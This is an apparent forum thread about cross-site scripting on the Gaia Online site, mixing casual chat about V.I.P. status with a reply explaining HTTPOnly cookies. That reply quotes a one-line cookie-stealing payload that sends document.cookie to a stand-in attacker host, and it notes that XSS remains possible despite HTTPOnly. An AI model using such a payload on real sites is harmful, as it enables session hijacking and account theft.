Lol .
If I had, I couldn't tell you. Gaia is convinced that they're safe. If I had done this and they knew, they'd throw a fit and fix it.
Have You Tried To Do It Again? Did You Succeed?
Gaia has made an effort to stop XSS. They believe they have succeeded. Gaia makes sure your SID is safe from document.cookie. They do this by using a type of session called HTTPOnly. Anyone in a browser that supports HTTPOnly (Most modern browsers) is safe from someone using a simple script such as the following: document.location="http://mybadsite.com/cookies.php?cookie="+document.cookie; However, that's not the only way to perform XSS. HTTPOnly gives a lot of webmasters/developers a false sense of security. While HTTPOnly helps a lot, it doesn't mean XSS is completely impossible. More information on HTTPOnly: HttpOnly - OWASP
Hmmm Is It Still Possible To Do With Gaia?
Cross-site scripting - Wikipedia, the free encyclopedia
Oh I Forgot To Ask What Is XXS Or XSS
I don't think anyone has V.I.P. currently. I don't know though since I haven't been on a lot. I think there was no one in V.I.P. last time I was posting a lot.
Lol I Want VIP D:
It's funny because after I left, one of them was banned and the V.I.P. bullshit was revoked.